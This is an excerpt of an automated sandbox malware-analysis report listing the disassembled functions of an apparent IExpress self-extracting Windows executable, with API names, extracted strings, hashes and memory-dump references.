                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                        • API String ID: 1979080616-3881341942
                                                                                                        • Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                                                                        • Instruction ID: bfa041b1a294fb87adea056bc2d3b95aed50331e682c26a3b001734109fa9470
                                                                                                        • Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                                                                        • Instruction Fuzzy Hash: 3D515B61A397C281EA51AB25AC103BBE7A1BF45F40FDC4537C98E4A6D5DF3CE404C622
                                                                                                        Function 00007FF7E6E82C54 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84libraryloadershutdownCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                                        • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                                        • API String ID: 1302179841-1204263913
                                                                                                        • Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                                                        • Instruction ID: 2a6f9875925b07cec0a5f08d9c86570c7a5823e646f84dd5860e909fbc7a31e6
                                                                                                        • Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                                                        • Instruction Fuzzy Hash: 6E312D21E287C28AFA607B60AC45377EA90BF55F50FCC4137D98D0A6D5CF3CE8408A62
                                                                                                        Function 00007FF7E6E8204C Relevance: 12.1, APIs: 8, Instructions: 119filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                        • String ID:
                                                                                                        • API String ID: 836429354-0
                                                                                                        • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                        • Instruction ID: 7f46f6b7141761435a5cbfc99fa211953e4e209384735cd01d1f59057ad76700
                                                                                                        • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                        • Instruction Fuzzy Hash: CD518031A28AC189EB11AF20DC543EAA7A1FB45F84FC84172DA8E0B6D5DF3CD909C351
                                                                                                        Function 00007FF7E6E87AC8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                        • String ID:
                                                                                                        • API String ID: 1214682469-0
                                                                                                        • Opcode ID: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                                        • Instruction ID: 451d40668e51cb6a3f42b7f68be250edbfb69874a0d6f81c16184c4fdcf21026
                                                                                                        • Opcode Fuzzy Hash: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                                        • Instruction Fuzzy Hash: E2115431A18B8186EA109B15F84426AFAA1FB49FE1F8C4735DE9D0B7D4DF3CD4408B10
                                                                                                        Function 00007FF7E6E83910 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 119threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                                        • String ID: $Adv
                                                                                                        • API String ID: 2654313074-3776740653
                                                                                                        • Opcode ID: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                                        • Instruction ID: 5bdec61aa559caefa4458b978a4d189e2463950ff6355757c8a7fb3f3413f61f
                                                                                                        • Opcode Fuzzy Hash: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                                        • Instruction Fuzzy Hash: 55517431D18AC286E7106B55ED4437AEA61FB89F55F889233C99E0BBD4CF3C94458712
                                                                                                        Function 00007FF7E6E861EC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97registryfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                        • API String ID: 3049360512-2947520418
                                                                                                        • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                                                        • Instruction ID: 241f17289ff3a60c6d49a6bd3e5f52e9183db7f01d5dbb9a3620d8aec2e4a3b5
                                                                                                        • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                                                        • Instruction Fuzzy Hash: DB51FF21A286C286EA51AB14FC543BAF7A0FB85F45F8C4172D68D4B6D5DF3CD848C722
                                                                                                        Function 00007FF7E6E8473C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115processsynchronizationwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3183975587-3916222277
                                                                                                        • Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                                                                        • Instruction ID: 76368c629e4880684328a949cc9f577d5a931c2be0bb26997186bdc25629ac54
                                                                                                        • Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                                                                        • Instruction Fuzzy Hash: 84516E329287C1C6E760AB14E85537BF7A0FB88B55F884136E68D4A6E4CF7CD444CB62
                                                                                                        Function 00007FF7E6E82318 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                        • API String ID: 2209512893-559176071
                                                                                                        • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                        • Instruction ID: 02d901b94573ced9e9e4b49a99517620b208302ecd73e258c3a5015c022038b3
                                                                                                        • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                        • Instruction Fuzzy Hash: AF319F32A18B82CAD7109F24FC406AAF7A4FB89B44F884536E68D07B94CF38D454CB51
                                                                                                        Function 00007FF7E6E863B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 71fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                        • String ID: IXP$IXP%03d.TMP
                                                                                                        • API String ID: 1082909758-3932986939
                                                                                                        • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                        • Instruction ID: 26a8263f8826bea92a16cf54671c872fb1aac306d8b9c02416a194d2cb7f7cad
                                                                                                        • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                        • Instruction Fuzzy Hash: 3A212F31A189C186E610AB16BD543FAE791FB8AF91F888132DD8E4B7D5CF3CD445C612
                                                                                                        Function 00007FF7E6E88200 Relevance: 12.1, APIs: 8, Instructions: 136sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2995914023-0
                                                                                                        • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                                        • Instruction ID: 187acba5fc74f0a6fea179113941eb291c18ded6adbfe99ea799535785f3c323
                                                                                                        • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                                        • Instruction Fuzzy Hash: 37513B31928A8286E760AB65EC54377A3A0FB45F64FDC0432D98D8B6D5DF3CE841C762
                                                                                                        Function 00007FF7E6E860A4 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85078
                                                                                                          • Part of subcall function 00007FF7E6E85050: SizeofResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85089
                                                                                                          • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850AF
                                                                                                          • Part of subcall function 00007FF7E6E85050: LoadResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850C0
                                                                                                          • Part of subcall function 00007FF7E6E85050: LockResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850CF
                                                                                                          • Part of subcall function 00007FF7E6E85050: memcpy_s.MSVCRT ref: 00007FF7E6E850EE
                                                                                                          • Part of subcall function 00007FF7E6E85050: FreeResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850FD
                                                                                                        • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7E6E83123), ref: 00007FF7E6E860C9
                                                                                                        • LocalFree.KERNEL32 ref: 00007FF7E6E86142
                                                                                                          • Part of subcall function 00007FF7E6E84DCC: LoadStringA.USER32 ref: 00007FF7E6E84E60
                                                                                                          • Part of subcall function 00007FF7E6E84DCC: MessageBoxA.USER32 ref: 00007FF7E6E84EA0
                                                                                                          • Part of subcall function 00007FF7E6E87700: GetLastError.KERNEL32 ref: 00007FF7E6E87704
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                        • String ID: $<None>$UPROMPT
                                                                                                        • API String ID: 957408736-2569542085
                                                                                                        • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                        • Instruction ID: 9035c5d1042de8d18701ed8f7577a86e1d98560b63b7383bafed24c2f7606c28
                                                                                                        • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                        • Instruction Fuzzy Hash: B7317071E2838287E7216B20ED5077BFA51FB85F84F884136CA8E0A6D2DF7DD4048B12
                                                                                                        Function 00007FF7E6E85380 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile$lstrcmp
                                                                                                        • String ID: *MEMCAB
                                                                                                        • API String ID: 1301100335-3211172518
                                                                                                        • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                                        • Instruction ID: 94050c8daedb2e5b274a3c07dcfe3c420e1c8c44b5f8c2cf25102abcf29f2721
                                                                                                        • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                                        • Instruction Fuzzy Hash: AC61BA629287C186F7A09B14AD84376BA91F745F74F885336CAAE0B7D1CF7CE4058722
                                                                                                        Function 00007FF7E6E858B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileTime$AttributesDateLocalTextWindow
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                        • API String ID: 1150793416-1955631000
                                                                                                        • Opcode ID: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                                                        • Instruction ID: a49b5264b18684f559bb215e3a33d398b5cec8ec7035cc85701bed28599bed94
                                                                                                        • Opcode Fuzzy Hash: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                                                        • Instruction Fuzzy Hash: 7D518321A38AC285EA90AB15DC403BBA790FB48F50FCC5133D98E4B2D6CE3CE545C361
                                                                                                        Function 00007FF7E6E84C68 Relevance: 10.6, APIs: 7, Instructions: 100COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                        • String ID:
                                                                                                        • API String ID: 2212493051-0
                                                                                                        • Opcode ID: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                                                        • Instruction ID: fb5ab862797e0f36d4e57c8b1e5c5e5c7dade5106efbc3d59d7426d25bbbeb91
                                                                                                        • Opcode Fuzzy Hash: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                                                        • Instruction Fuzzy Hash: 4C318232B246418AE7109B75E8046BEBBB1F789F99F995131CE4A57B84CF3CE445CB10
                                                                                                        Function 00007FF7E6E86B70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocLocal
                                                                                                        • String ID: TMP4351$.TMP
                                                                                                        • API String ID: 3494564517-2619824408
                                                                                                        • Opcode ID: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                                                        • Instruction ID: c6eb98ce7d295054a40796a390f4387be14a25d43f5c5e8fa1026a1216d4b401
                                                                                                        • Opcode Fuzzy Hash: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                                                        • Instruction Fuzzy Hash: 1A318121A1878186E7106B24B8143BBFA91FB85FA4F884336DAAE0B7D5CF3CD4058711
                                                                                                        Function 00007FF7E6E85690 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7E6E83B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF7E6E83A09), ref: 00007FF7E6E83B64
                                                                                                          • Part of subcall function 00007FF7E6E83B40: PeekMessageA.USER32 ref: 00007FF7E6E83B89
                                                                                                          • Part of subcall function 00007FF7E6E83B40: PeekMessageA.USER32 ref: 00007FF7E6E83BCD
                                                                                                        • WriteFile.KERNELBASE ref: 00007FF7E6E856E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1084409-0
                                                                                                        • Opcode ID: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                                                        • Instruction ID: 3294931d5d37de87bc32ccf215d68cc261d48c1ae8bd4e337359dee14bcdddb7
                                                                                                        • Opcode Fuzzy Hash: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                                                        • Instruction Fuzzy Hash: 2A219220A28AC286E710AF55EC44736F761FB85F94F988236D9AD0E6E5CF3DE405CB11
                                                                                                        Function 00007FF7E6E851BC Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
